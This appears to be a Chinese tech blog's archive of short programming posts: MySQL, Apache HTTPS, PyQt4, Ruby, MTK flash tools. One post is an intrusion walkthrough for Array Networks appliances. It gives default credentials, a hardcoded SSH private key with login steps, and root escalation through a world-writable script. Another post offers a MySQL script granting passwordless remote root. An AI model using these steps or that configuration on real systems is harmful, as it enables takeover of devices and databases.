编程 5 分钟 读完 (约 685 字)

默认安装的MySQL数据库,无法远程连接。
登录MySQL之后,运行

1
SELECT user,host from mysql.user;

如果只有一条记录,说明是这个原因。
将下面的脚本保存成user.sql,登录MySQL,运行:

1
2
3
use mysql;
source user.sql;
flush privileges;

Notice: 会重置MySQL user表,并且将root用户密码设置为空。

脚本内容: 点这里直接下载

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
SET FOREIGN_KEY_CHECKS=0;

-- ----------------------------
-- Table structure for `user`
-- ----------------------------
USE mysql;
DROP TABLE IF EXISTS `user`;
CREATE TABLE `user` (
  `Host` char(60) COLLATE utf8_bin NOT NULL DEFAULT '',
  `User` char(16) COLLATE utf8_bin NOT NULL DEFAULT '',
  `Password` char(41) CHARACTER SET latin1 COLLATE latin1_bin NOT NULL DEFAULT '',
  `Select_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Insert_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Update_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Delete_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Create_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Drop_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Reload_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Shutdown_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Process_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `File_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Grant_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `References_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Index_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Alter_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Show_db_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Super_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Create_tmp_table_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Lock_tables_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Execute_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Repl_slave_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Repl_client_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Create_view_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Show_view_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Create_routine_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Alter_routine_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Create_user_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Event_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Trigger_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `ssl_type` enum('','ANY','X509','SPECIFIED') CHARACTER SET utf8 NOT NULL DEFAULT '',
  `ssl_cipher` blob NOT NULL,
  `x509_issuer` blob NOT NULL,
  `x509_subject` blob NOT NULL,
  `max_questions` int(11) unsigned NOT NULL DEFAULT '0',
  `max_updates` int(11) unsigned NOT NULL DEFAULT '0',
  `max_connections` int(11) unsigned NOT NULL DEFAULT '0',
  `max_user_connections` int(11) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`Host`,`User`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin COMMENT='Users and global privileges';

-- ----------------------------
-- Records of user
-- ----------------------------
INSERT INTO `user` VALUES ('localhost', 'root', '', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', '', '', '', '', '0', '0', '0', '0');
INSERT INTO `user` VALUES ('127.0.0.1', 'root', '', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', '', '', '', '', '0', '0', '0', '0');
INSERT INTO `user` VALUES ('%', 'root', '', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', '', '', '', '', '0', '0', '0', '0');
flush privileges;

编程 几秒 读完 (约 86 字)

Python
先按F5,之后将下面的命令保存,再设置快捷键。

1
cmd /k  c:\python27\python "$(FULL_CURRENT_PATH)" & PAUSE & EXIT

我使用的是Ctrl+F9
之后按Ctrl+s保存更改,再按Ctrl+F7即可快速在cmd中运行代码,方便调试。

Ruby

1
cmd /k  C:\Ruby22-x64\bin\ruby "$(FULL_CURRENT_PATH)" & PAUSE & EXIT

编程 几秒 读完 (约 88 字)

使用Phantomjs访问网页并截图

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
var page = require('webpage').create();

page.onResourceRequested = function(request) {
  console.log('Request ' + JSON.stringify(request, undefined, 4));
    console.log( '---------------------------------------------------------------------' );
};
page.onResourceReceived = function(response) {
  console.log('Receive ' + JSON.stringify(response, undefined, 4));
  console.log( '---------------------------------------------------------------------' );
};

page.open('https://www.baidu.com', function(status) {
      console.log("Status: " + status);
      if(status === "success") {
              page.render('example.png');
            }
      phantom.exit();
});


example.png

example.png

Phantomjs已经接近废弃,如今推荐使用google的headless技术。

编程 1 分钟 读完 (约 123 字)

首先,如果没有签名密钥,先生成密钥:

1
keytool -genkey -alias android.keystore -keyalg RSA -validity 20000 -keystore android.keystore

接着会提示你输入密码、地区、国家等等,根据提示输入即可。
我这里的用户名和密码都是android

然后使用密钥进行签名

1
jarsigner -keystore android.keystore -storepass android -keypass android XXX.apk android.keystore

keytool和jarsigner都是jdk自带的工具,配好环境变量就可以直接在命令行使用的。

编程 5 分钟 读完 (约 735 字)

https://startssl.com 这个网站可以给我们免费提供可信任的https证书,这里简单介绍一下配置的过程。
首先服务器需要安装openssl和apache的mod_ssl.so模块,并且需要在httpd.conf中开启这个模块。
完成上述操作之后就可以使用openssl生成你自己的证书了。
这里有些知识你需要了解一下。
https的整个服务中,你需要了解这些文件的作用:

server.key 服务器的私钥
server.crt 服务器的证书文件
server.csr 服务器证书请求文件
root.crt   根证书

这些文件是这样生成的

首先运行

1
openssl req -new -nodes -keyout chorder.net.key -out chorder.net.csr

生成服务器证书和服务器证书请求文件,过程中会要求输入很多有关证书的信息和密码。
这一步完成之后会生成两个文件,chorder.net.key和chorder.net.csr
这时候去startssl网站上注册帐号,然后提交自己生成的.csr文件,让startssl为你生成一个
服务器证书和根证书。
把两个.crt结尾的证书拷贝到服务器的/etc/pki/tls/certs/下,把.key和.csr文件拷贝到/etc/pki/tls/private/下。(只针对CentOS服务器,其他服务器请自行百度)。
另外还需要将/etc/pki/tls/下的cert.pem(如果没有则创建一个)链接指向到/etc/pki/tls/certs/root.crt
这样用火狐浏览器访问的时候才不会报 SEC_ERROR_UNKNOWN_ISSUER 这个错误。
这个cert.pem就是证书链,只有当你的服务器证书包含在startssl网站的证书链中,客户端才会认为你的证书是可信的。

最后,修改两个文件。

1 /etc/httpd/conf.d/ssl.conf

在该文件中修改以下内容:

指定服务器证书

1
SSLCertificateFile /etc/pki/tls/certs/chorder.net.crt

指定服务器私钥

1
SSLCertificateKeyFile /etc/pki/tls/private/chorder.net.key

指定服务器证书链

1
SSLCertificateChainFile /etc/pki/tls/certs/root-bundle.crt

2 /etc/httpd/conf/httpd.conf

为你的主机(我这里是虚拟主机)创建配置

我的配置如下

NameVirtualHost *:443
<VirtualHost *:443>
    SSLEngine on
    SSLCertificateFile /etc/pki/tls/certs/chorder.net.crt
    SSLCertificateKeyFile /etc/pki/tls/private/chorder.net.key
    SSLCertificateChainFile /etc/pki/tls/cert.pem
    ServerName chorder.net
    ServerAdmin ×××××
    DocumentRoot ×××××
    ErrorLog ×××××
    CustomLog ×××××
</VirtualHost>

其实就是http配置文件下多加了几行。
配置好这些以后,重启服务,完成。
另外,如果你希望访问你的域名直接跳转到https端口,可以写一段js来跳转,如果觉得
写代码太麻烦,可以在根目录的.htaccess文件中加入这两行来帮你自动跳转:

1
2
RewriteCond %{SERVER_PORT} !^443$
RewriteRule (.*) https://%{SERVER_NAME}/$1 [R]

这样就将默认端口指定为443,并且将所有http的请求重写为https.

编程 1 分钟 读完 (约 116 字)

环境:
Windows 10
Python 2.7.10

0x01 安装PyQt4
在这个页面下载,注意选对版本。
https://riverbankcomputing.com/software/pyqt/download
我选择的版本是 PyQt4-4.11.4-gpl-Py2.7-Qt4.8.7-x64.exe

0x02 编写测试脚本

1
2
3
4
5
6
7
8
9
import sys
from PyQt4 import QtGui

app = QtGui.QApplication(sys.argv)
widget = QtGui.QWidget()
widget.resize(250, 150)
widget.setWindowTitle('PyQt')
widget.show()
sys.exit(app.exec_())

如果成功运行并弹出一个空白的窗口,说明PyQt4已经安装上了。

0x03 使用PyQt4的QtWebKit实现解析Dom

待续。

安全技术 6 分钟 读完 (约 944 字)

这是一个比较老的漏洞了,但是到目前为止仍然有不少厂商在使用这个版本的设备。在渗透中也曾经遇到过。
参考自:https://www.exploit-db.com/exploits/32369/

受影响的产品有: Array Networks vxAG 9.2.0.34 and vAPV 8.3.2.17 appliances

默认用户和密码

vxAG 9.2.0.34 和 vAPV 8.3.2.17 的/etc/master.passwd 文件中包含了默认用户和密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
$ cat /etc/master.passwd
# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:$1$9QkJT4Y5$lF2BPaSI2kPlcrqz89yZv0:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission
User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default
User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP
pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
test:$1$UtEw8DNY$te4MRasnXgETxWOZ9Z1o10:1002:1002::0:0:test:/export/test:/bin/tcsh
sync:$1$bmfGRJPh$lWnesbn8M8xZNo3uaqfEd1:1005:0::0:0:sync:/export/sync:/bin/sh
recovery::65533:0::0:0:Recovery User:/:/ca/bin/recovery
mfg:$1$i8SV4bKc$lNMeb8Yow.p.cZvWxt1mO1:1013:1010::0:0:mfg:/export/mfg:/bin/tcsh
arraydb:*:1015:0::0:0:User &:/home/arraydb:/bin/sh
array::1016:1011::0:0:User &:/:/ca/bin/ca_shell

破解之后可以得到下列用户和密码:

1
2
用户: mfg 密码: mfg
用户: sync 密码: click1

test和root用户没破解出来。

其中sync用户默认可以远程登录:

1
2
3
4
$ssh sync@192.168.2.55 /bin/sh
sync@192.168.2.55's password:
$id
uid=1005(sync) gid=0(wheel) groups=0(wheel)

SSH 私钥

sync 用户使用了位于 “~/.ssh/id_dsa” 的登录私钥:

1
2
3
4
5
6
7
8
9
10
11
12
13
$ cat id_dsa
-----BEGIN DSA PRIVATE KEY-----
MIIBugIBAAKBgQCUw7F/vKJT2Xsq+fIPVxNC/Dyk+dN9DWQT5RO56eIQasd+h6Fm
q1qtQrJ/DOe3VjfUrSm7NN5NoIGOrGCSuQFthFmq+9Lpt6WIykB4mau5iE5orbKM
xTfyu8LtntoikYKrlMB+UrmKDidvZ+7oWiC14imT+Px/3Q7naj0UmOrSTwIVAO25
Yf3SYNtTYv8yzaV+X9yNr/AfAoGADAcEh2bdsrDhwhXtVi1L3cFQx1KpN0B07JLr
gJzJcDLUrwmlMUmrXR2obDGfVQh46EFMeo/k3IESw2zJUS58FJW+sKZ4noSwRZPq
mpBnERKpLOTcWMxUyV8ETsz+9oz71YEMjmR1qvNYAopXf5Yy+4Zq3bgqmMMQyM+K
O1PdlCkCgYBmhSl9CVPgVMv1xO8DAHVhM1huIIK8mNFrzMJz+JXzBx81ms1kWSeQ
OC/nraaXFTBlqiQsvB8tzr4xZdbaI/QzVLKNAF5C8BJ4ScNlTIx1aZJwyMil8Nzb
+0YAsw5Ja+bEZZvEVlAYnd10qRWrPeEY1txLMmX3wDa+JvJL7fmuBgIUZoXsJnzs
+sqSEhA35Le2kC4Y1/A=
-----END DSA PRIVATE KEY-----

下列文件位于 ~/.ssh 目录:

1
2
3
4
5
6
7
8
9
$ cat authorized_keys
1024 35
117781646131320088945310945996213112717535690524599971400605193647439008360689916421327587459429042579662784434303538942896683338584760112042194838342054595473085094045804963620754645364924583113650482968246287214031112796524662479539236259838315876244144983122361617319660444993650437402628793785173700484401
sync@AN

$ cat authorized_keys2
ssh-dss
AAAAB3NzaC1kc3MAAACBAJTDsX+8olPZeyr58g9XE0L8PKT5030NZBPlE7np4hBqx36HoWarWq1Csn8M57dWN9StKbs03k2ggY6sYJK5AW2EWar70um3pYjKQHiZq7mITmitsozFN/K7wu2e2iKRgquUwH5SuYoOJ29n7uhaILXiKZP4/H/dDudqPRSY6tJPAAAAFQDtuWH90mDbU2L/Ms2lfl/cja/wHwAAAIAMBwSHZt2ysOHCFe1WLUvdwVDHUqk3QHTskuuAnMlwMtSvCaUxSatdHahsMZ9VCHjoQUx6j+TcgRLDbMlRLnwUlb6wpniehLBFk+qakGcREqks5NxYzFTJXwROzP72jPvVgQyOZHWq81gCild/ljL7hmrduCqYwxDIz4o7U92UKQAAAIBmhSl9CVPgVMv1xO8DAHVhM1huIIK8mNFrzMJz+JXzBx81ms1kWSeQOC/nraaXFTBlqiQsvB8tzr4xZdbaI/QzVLKNAF5C8BJ4ScNlTIx1aZJwyMil8Nzb+0YAsw5Ja+bEZZvEVlAYnd10qRWrPeEY1txLMmX3wDa+JvJL7fmuBg==
sync@AN

如此一来就可以使用这个私钥进入系统:

将下面的id_dsa私钥保存在”synckey”文件中:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
cat > ~/synckey << EOF
-----BEGIN DSA PRIVATE KEY-----
MIIBugIBAAKBgQCUw7F/vKJT2Xsq+fIPVxNC/Dyk+dN9DWQT5RO56eIQasd+h6Fm
q1qtQrJ/DOe3VjfUrSm7NN5NoIGOrGCSuQFthFmq+9Lpt6WIykB4mau5iE5orbKM
xTfyu8LtntoikYKrlMB+UrmKDidvZ+7oWiC14imT+Px/3Q7naj0UmOrSTwIVAO25
Yf3SYNtTYv8yzaV+X9yNr/AfAoGADAcEh2bdsrDhwhXtVi1L3cFQx1KpN0B07JLr
gJzJcDLUrwmlMUmrXR2obDGfVQh46EFMeo/k3IESw2zJUS58FJW+sKZ4noSwRZPq
mpBnERKpLOTcWMxUyV8ETsz+9oz71YEMjmR1qvNYAopXf5Yy+4Zq3bgqmMMQyM+K
O1PdlCkCgYBmhSl9CVPgVMv1xO8DAHVhM1huIIK8mNFrzMJz+JXzBx81ms1kWSeQ
OC/nraaXFTBlqiQsvB8tzr4xZdbaI/QzVLKNAF5C8BJ4ScNlTIx1aZJwyMil8Nzb
+0YAsw5Ja+bEZZvEVlAYnd10qRWrPeEY1txLMmX3wDa+JvJL7fmuBgIUZoXsJnzs
+sqSEhA35Le2kC4Y1/A=
-----END DSA PRIVATE KEY-----
EOF

修改synckey文件的权限:

1
chmod 600 ~/synckey

使用该私钥登录系统:

1
ssh -i ~/synckey sync@x.x.x.x /bin/sh

提权

/ca/bin/monitor.sh和 /ca/bin/debug_syn_stat默认是全局可写的 (权限为777).
在monitor.sh文件中写入脚本,通过debug monitor选项重新启动该脚本会以root权限运行。
使用sync用户运行/ca/bin/backend工具,使用如下方式重启debug monitor:
关闭debug monitor:

1
/ca/bin/backend -c "debug monitor off"`echo -e "\0374"`

开启debug monitor:

1
/ca/bin/backend -c "debug monitor on"`echo -e "\0374"`

在/ca/bin/monitor.sh中写入反弹shell的指令,通过上述操作,即可反弹回一个root shell.

编程 6 分钟 读完 (约 869 字)

SPFlashTool version for different MTK processor

SP_Flash_Tool-v3.1224.0.100
MT6516,MT6573,MT6573,MT6575,MT6575,MT6577

SP_Flash_Tool-v3.1332.0.187
MT6516,MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6582,MT8135

SP_Flash_Tool-v3.1344.0.212
MT6516,MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6582,MT8135,MT6592,MT6571

SP_Flash_Tool-v5.1352.01
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT6592

SP-Flash-Tool-v5.1436.00
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752

SP-Flash-Tool-v5.1528.00
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6735M,MT6753,MT8163,MT8590,MT6580,MT6570

SP-Flash-Tool-v5.1532.00
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6735M,MT6753,MT8163,MT8590,MT6580,MT6570,MT6755

SP_Flash_Tool_5.1343
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT6592

SP_Flash_Tool_5.1504
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6735M,MT6753

SP_Flash_Tool_5.1520
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6735M,MT6753,MT8163,MT8590,MT6580,MT6570

SP_Flash_Tool_5.1524.00
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6735M,MT6753,MT8163,MT8590,MT6580,MT6570

SP_Flash_Tool_v5.1452
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6735M,MT6753

SP_Flash_Tool_v5.1512
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6735M,MT6753,MT8163,MT8590,MT6580,MT6570

SP_Flash_Tool_v5.1516
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6735M,MT6753,MT8163,MT8590,MT6580,MT6570

SP_Flash_Tool_v5.1548
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737,MT6735M,MT6753,MT8163,MT8590,MT6580,MT6570,MT6755,MT6797

SP_Flash_Tool_v5.1552
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT7623,MT6580,MT6570,
MT6755,MT6797

SP_Flash_Tool_v5.1604
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT7623,MT6580,MT6570,
MT6755,MT6750,MT6797

SP_Flash_Tool_v5.1612
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT7623,MT6580,MT6570,
MT6755,MT6750,MT6797,MT6757

SP_Flash_Tool_v5.1616_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT7623,MT6580,MT6570,
MT6755,MT6750,MT6797,MT6757,ELBRUS,MT6798,MT0507

SP_Flash_Tool_v5.1620_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT7623,MT6580,MT6570,
MT6755,MT6750,MT6797,MT6757,ELBRUS,MT6798,MT0507,MT8160,MT0633

SP_Flash_Tool_v5.1624_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT7623,MT6580,MT6570,
MT6755,MT6750,MT6797,MT6757,ELBRUS,MT6798,MT0507,MT8167,MT0633

SP_Flash_Tool_v5.1628_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT7623,MT6580,MT6570,
MT6755,MT6750,MT6797,MT6757,ELBRUS,MT6799,MT0507,MT8167,MT0633

SP_Flash_Tool_v5.1632_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT8521,MT7623,MT6580,
MT6570,MT6755,MT6750,MT6797,MT6757,ELBRUS,MT6799,MT0507,MT8167,MT6570,MT0690

SP_Flash_Tool_v5.1636_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT8521,MT7623,MT6580,
MT6570,MT6755,MT6750,MT6797,MT6757,ELBRUS,MT6799,MT6798,MT8167,MT6570,MT0690

SP_Flash_Tool_v5.1640_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT8521,MT7623,MT6580,
MT6570,MT6755,MT6750,MT6797,MT6757,MT6757D,ELBRUS,MT6799,MT6798,MT8167,MT6570,MT0690

SP_Flash_Tool_v5.1644_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT8521,MT7623,MT6580,
MT6570,MT6755,MT6750,MT6797,MT6757,MT6757D,ELBRUS,MT6799,MT6798,MT8167,MT6570,MT0690

SP_Flash_Tool_v5.1648_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT8521,MT7623,MT6580,
MT6570,MT6755,MT6750,MT6797,MT6757,MT6757D,ELBRUS,MT6799,MT6759,MT8167,MT8516,MT6570,MT6763

编程 7 分钟 读完 (约 1017 字)

1.数组遍历方法总结

1
array = (1..10).to_a 
1
2
3
4
5
length = array.length 
length.times do t 
print "#{array[t]} " 
end 
puts "n" 
1
2
3
4
5
length = array.length-1 
for i in 0..length do 
print "#{array[i]} " 
end 
puts "n" 
1
2
3
4
for i in array do 
    print "#{i} " 
end 
puts "n" 
1
2
array.each{x print x," "} 
puts "n" 
1
2
3
4
5
6
7
length = array.length 
i = 0 
while i< length do 
print "#{array[i]} " 
i = i+1 
end 
puts "n" 
1
2
3
4
5
6
7
length = array.length 
i = 0 
until i==length do 
print "#{array[i]} " 
i += 1 
end 
puts "n" 
1
2
array.each_index do i 
print "#{array[i]} "

2.Ruby连接数据库

  • mysql
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    require 'mysql'  
    begin  
        db = Mysql.init  
        db.options(Mysql::SET_CHARSET_NAME, 'utf8')  
        db = Mysql.real_connect("127.0.0.1", "root", "123456", "test", 3306)  
        db.query("SET NAMES utf8")
        db.query("drop table if exists tb_test")  
        db.query("create table tb_test (id int,
        text LONGTEXT) ENGINE=MyISAM DEFAULT CHARSET=utf8")  
        db.query("insert into tb_test (id, text) values ( 
        1,'first line'),(2,'second line')")  
        printf "%d rows were inserted\n",db.affected_rows  
        rslt = db.query("select text from tb_test")  
        while row = rslt.fetch_row do  
            puts row[0]  
        end  
    rescue Mysql::Error => e  
            puts "Error code: #{e.errno}"  
            puts "Error message: #{e.error}"  
            puts "Error SQLSTATE: #{e.sqlstate}" if e.respond_to?("sqlstate")  
    ensure  
            db.close if db  
    end
  • redis
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    #!/bin/ruby

    require 'redis'

    def writeToFile(file,content)
        fp = File.new(file,"a+") 
        if fp
            fp.syswrite(content)
        else
            puts "..."
        end
    end

    def connect(host)
        redis = Redis.new(:host => host,:port => 6379)
        redis.info.keys.each do |key|
            puts "#{key}:\t"+redis.info["#{key}"]
        end
    end

    connect("1.1.1.1")
  • sqlite3
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    require 'sqlite3'

    db = SQLite3::Database.new('test.db')

    db.execute("create table test(
                    ID integet not null,
                    Username varchar(20) null,
                    Password varchar(64) null)")
    db.execute("insert into test(ID.Username,Password) 
        values('0','admin','admin')")
    db.execute("select * from test")
    db.execute("update test set password='12345' where id=0")

3.Ruby socket

  • 服务端:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    require 'socket'

    server = TCPServer.open('0.0.0.0', 8080)
    loop do
        Thread.start(server.accept) do |client|
            begin
                while true
                    puts "#{client.to_i} online"
                    data = client.read()
                    throw "empty" if data.empty?
                    #puts data.length
                    puts data
                end
            rescue Exception => e
                puts "#{client.to_i} offline"
            end
        end
    end

  • 客户端:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    require 'socket'

    hostname = '127.0.0.1'
    port = 8080
    buf = 'test'
    s = TCPSocket.open(hostname, port)
    s.write buf
    sleep(1)
    s.close

4.ruby gem 文档服务

rubygems.org上的gem文档访问起来太慢了,其实gem本身就自带doc的功能
